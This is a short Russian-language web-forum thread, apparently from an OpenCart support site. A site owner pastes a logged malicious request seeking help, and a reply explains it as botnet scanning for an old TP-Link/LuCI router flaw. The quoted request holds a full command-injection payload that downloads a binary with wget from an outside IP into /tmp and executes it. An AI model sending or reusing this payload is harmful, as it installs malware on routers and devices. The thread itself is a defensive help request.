Rashp Опубликовано 27.06.2024 в 01:45 Поделиться Опубликовано 27.06.2024 в 01:45 (изменено) Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему? Изменено 27.06.2024 в 01:49 пользователем Rashp 0 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Rashp Опубликовано 27.06.2024 в 11:20 Автор Поделиться Опубликовано 27.06.2024 в 11:20 Знающие, ответьте пожалуйста. 0 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
freeworld Опубликовано 28.06.2026 в 11:25 Поделиться Опубликовано 28.06.2026 в 11:25 Эти странные запросы — просто автоматический спам. Специальные роботы (ботнеты) сканируют вообще все IP-адреса в интернете подряд. Они ищут старую уязвимость в роутерах TP-Link и прошивках OpenWrt (интерфейс LuCI), чтобы закинуть туда свой вредоносный скрипт. Бот даже не догадывается, что по твоему адресу находится сайт на OpenCart — он просто стучится во все двери без разбора. А вот 500-я ошибка вылезла из-за того, что ты решил подстраховаться и закрыл права на папку /tmp. 0 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.